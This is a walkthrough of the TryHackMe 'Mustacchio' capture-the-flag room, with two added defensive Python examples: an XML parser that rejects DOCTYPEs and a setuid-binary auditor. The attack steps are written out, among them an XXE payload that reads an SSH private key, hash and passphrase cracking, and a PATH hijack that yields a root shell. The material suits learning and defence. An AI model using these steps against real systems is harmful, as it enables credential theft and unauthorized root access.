THM Mustacchio Walkthrough
TryHackMe is a popular service that offers CTF- and walkthrough-style rooms to help people interested in infosec gain new knowledge. The TryHackMe Mustacchio room is a rather easy CTF that includes local file disclosure through XML external entities (XXE), hash cracking and a simple privilege escalation by manipulating the PATH variable.
THM Room: here
Information Gathering
As usual, let's begin with an nmap scan to gain information about the THM Mustacchio machine:
sudo nmap -p 1-10000 -sV -v 10.10.62.15
This reveals three open ports:
- Port 22: OpenSSH 7.2p2 Ubuntu
- Port 80: Apache httpd 2.4.18
- Port 8765: nginx 1.10.3
Next, I used gobuster to enumerate the web server on port 80:
gobuster dir -u http://10.10.62.15/ -w ~/Lists/gobuster/Gobuster-Dir-Medium.txt -t 50
Gobuster found a directory called custom, which contains a folder called "js" and one called "css". CSS is probably not interesting for us, so let's start with the js folder.
Inside that folder we have a file called users.bak that we can download. Using file users.bak I checked the file type, which is a SQLite 3.x database.
Now we can either simply dump the printable strings using strings users.bak or use some sort of database browser like sqlitebrowser, which can be installed via apt-get. No matter how you proceed you will get the same result (a DB browser probably looks prettier, but it doesn't really matter in this case).
For this THM Mustacchio walkthrough I used strings, which makes it easier to display the result here:
└──╼ $strings users.bak
SQLite format 3
tableusersusers
CREATE TABLE users(username text NOT NULL, password text NOT NULL)
]admin1868e36a6d2b17d4c2745f1659433a54d4bc5f4b
Gaining access
Using hashcat we can crack that hash (SHA1 format):
hashcat -m 100 hashfile ~/Lists/Wordlists/rockyou.txt
To display the plaintext password, add --show after hashcat in the command (or use: !! --show).
Unfortunately, the credentials cannot be used to log into an SSH session, but we have another web service to enumerate (remember port 8765).
The web service on port 8765 shows a login form for an admin panel; there the credentials can be used.
Taking a look at the source code of the panel we find the following comment:
<!-- Barry, you can now SSH in using your key!-->
Also, it looks like the textbox takes XML code, as the name of the textarea is "xml".
Ok, so the default location for an SSH key is /home/user/.ssh/id_rsa, so let's try to display Barry's key via an external entity with the following payload:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY nop SYSTEM "file:///home/barry/.ssh/id_rsa" >
]>
<feed>
<name>&nop;</name>
<Subject>nop</Subject>
<Content>nop</Content>
</feed>
This reads the file and displays its content in the name paragraph; if the file does not exist or is not readable, nothing is displayed, but here we were successful.
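The server side of this bug is a parser that resolves the entity declared in the DOCTYPE. The following is an added example (not code from the room or from the walkthrough author) showing how the comment endpoint could reject such input: a pre-scan with the standard library's expat bindings refuses any DOCTYPE or entity declaration before the document is parsed, so no external entity is ever resolved. The element names (feed, name, Subject, Content) are the ones from the payload above; the benign sample is constructed.

```python
import xml.parsers.expat
from xml.etree import ElementTree as ET


class UnsafeXMLError(ValueError):
    """Raised when untrusted XML carries a DOCTYPE or an entity declaration."""


def reject_dtd(data: bytes) -> None:
    """Pre-scan the document with expat and refuse any DTD or entity declaration.

    External entities are what turn the comment form into a file-read primitive,
    so for untrusted input the robust policy is to reject DOCTYPEs outright
    instead of trying to filter individual entity kinds.
    """
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXMLError(f"DOCTYPE declaration not allowed (root: {name})")

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXMLError(f"entity declaration not allowed: {name}")

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    # Never load parameter entities either, so the scan itself touches no files or URLs.
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)
    parser.Parse(data, True)


def parse_comment(data: bytes) -> dict:
    """Parse a <feed> submission into its fields, rejecting anything with a DTD."""
    reject_dtd(data)
    root = ET.fromstring(data)
    if root.tag != "feed":
        raise UnsafeXMLError(f"unexpected root element {root.tag!r}")
    return {child.tag: (child.text or "") for child in root}


def is_accepted(data: bytes) -> bool:
    """True if the submission parses under the hardened policy, False if it is rejected."""
    try:
        parse_comment(data)
    except (UnsafeXMLError, ET.ParseError):
        return False
    return True


# Constructed samples: a normal comment, and the payload shown in the walkthrough.
BENIGN = b"<feed><name>Barry</name><Subject>hi</Subject><Content>hello</Content></feed>"
XXE_PAYLOAD = b"""<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY nop SYSTEM "file:///home/barry/.ssh/id_rsa" >
]>
<feed>
<name>&nop;</name>
<Subject>nop</Subject>
<Content>nop</Content>
</feed>"""

if __name__ == "__main__":
    print(parse_comment(BENIGN))
    print("XXE payload accepted:", is_accepted(XXE_PAYLOAD))
```

Rejecting the DOCTYPE wholesale is simpler and safer than allowlisting entity types: a comment form has no legitimate need for a DTD, and an error on the pre-scan is also a clean signal to log for detection.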
Gaining access via SSH
If you try to start an SSH session using the key with ssh barry@10.10.62.15 -i id_rsa you will be prompted with the following:
Enter passphrase for key 'id_rsa':
which means we have to crack the passphrase first, as the key file is encrypted.
Luckily, John the Ripper in combination with its toolset is perfect for that scenario.
Using ssh2john we can convert the key file into a hash that can be brute-forced by john itself (python ssh2john.py id_rsa > id_john).
Now we can brute-force the passphrase with: john --wordlist=~/Lists/Wordlists/rockyou.txt --format=SSH id_john
Finally, you are able to log in using ssh and obtain the first flag.
Privilege escalation
After navigating into the home directory of joe you can see an ELF file owned by root that has the SUID bit set and is executable by everybody.
When executed, the file simply shows us the nginx access.log file and doesn't take any user input.
I tried to extract information using strings live_log and found the command that is executed to display the log file: tail -f /var/log/nginx/access.log
This is a very easy privilege escalation: since tail is called without an absolute path, we just have to modify the PATH variable so that "our tail" executable gets used instead of the original one.
First I created a file called "tail" in my home directory with the following content:
#!/usr/bin/python3

import pty
pty.spawn('/bin/bash')
Next I modified the PATH variable using: export PATH=$PWD:$PATH
This puts my working directory (which is my home directory) in front of the original PATH string, so my tail executable is executed when live_log runs.
Eventually, you get a root shell and through that the system flag.
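The underlying weakness is a setuid-root binary that spawns a command by bare name. As an added example (not code from the room or from the walkthrough author), the script below audits a binary the way the strings step above does, but automatically: it pulls out printable strings, flags those that look like shell commands whose first word has no slash, and combines that with a setuid-root check. The "looks like a command" rule (a bare lower-case word followed by an option or an absolute path) is a heuristic of this example, and the embedded sample blob is constructed to mimic the relevant strings, not taken from the real live_log.

```python
import os
import re
import stat
import sys

# Runs of four or more printable ASCII bytes, the same default that `strings` uses.
_PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# A bare command word (no slash) is resolved through PATH by the shell that system()/popen() spawn.
_BARE_COMMAND = re.compile(r"^[a-z][a-z0-9_.+-]*$")


def extract_strings(blob: bytes) -> list:
    """Return the printable ASCII strings embedded in a binary blob."""
    return [m.group().decode("ascii") for m in _PRINTABLE.finditer(blob)]


def find_relative_commands(blob: bytes) -> list:
    """Return embedded strings that look like shell commands invoked by bare name.

    Heuristic (an assumption of this example): a command line starts with a bare
    lower-case word and is followed by an option or an absolute path argument.
    """
    hits = []
    for s in extract_strings(blob):
        tokens = s.split()
        if len(tokens) < 2 or not _BARE_COMMAND.match(tokens[0]):
            continue
        if tokens[1].startswith("-") or any(t.startswith("/") for t in tokens[1:]):
            hits.append(s)
    return hits


def is_setuid_root(path: str) -> bool:
    """True if the file is owned by uid 0 and has the set-user-ID bit set."""
    st = os.stat(path)
    return st.st_uid == 0 and bool(st.st_mode & stat.S_ISUID)


def audit(path: str) -> dict:
    """Combine both checks: a setuid-root binary that runs a bare command is the risky case."""
    with open(path, "rb") as fh:
        blob = fh.read()
    commands = find_relative_commands(blob)
    setuid_root = is_setuid_root(path)
    return {
        "setuid_root": setuid_root,
        "relative_commands": commands,
        "path_hijack_risk": setuid_root and bool(commands),
    }


# Constructed sample mimicking the strings of such a binary (not the real live_log file).
SAMPLE_BLOB = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 9
    + b"/lib64/ld-linux-x86-64.so.2\x00libc.so.6\x00system\x00"
    + b"tail -f /var/log/nginx/access.log\x00"
    + b"/usr/bin/id -u\x00"
    + b"GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.12) 5.4.0 20160609\x00.text\x00"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(audit(sys.argv[1]))   # usage: python3 audit_suid.py /path/to/binary
    else:
        print(find_relative_commands(SAMPLE_BLOB))
```

Note that "/usr/bin/id -u" in the sample is not reported: an absolute path does not go through PATH lookup, which is exactly the fix for this class of bug (call the helper by absolute path, or reset PATH to a fixed trusted value before spawning anything from a privileged program).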
I hope you liked this TryHackMe Mustacchio walkthrough; as always, if you have any questions feel free to reach out to me.
Tags:
THM, TryHackMe, Mustacchio